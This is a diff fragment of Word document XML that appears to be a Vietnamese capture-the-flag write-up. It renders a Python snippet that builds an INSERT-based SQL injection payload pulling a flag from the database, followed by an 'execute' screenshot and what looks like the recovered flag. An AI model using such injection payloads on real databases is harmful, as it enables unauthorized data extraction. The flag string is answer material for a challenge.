+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"'),('</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>{0}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>','pw', (SELECT flag FROM flag LIMIT 1)); -- -"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>format</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>setValue</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> += </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>getValue</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>Thực thi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05E9F7A2" wp14:editId="4D1D94BB">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1572570648" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1572570648" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>moaZ63rVXUhlQ8tVS7Hw</w:t>
+      </w:r>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
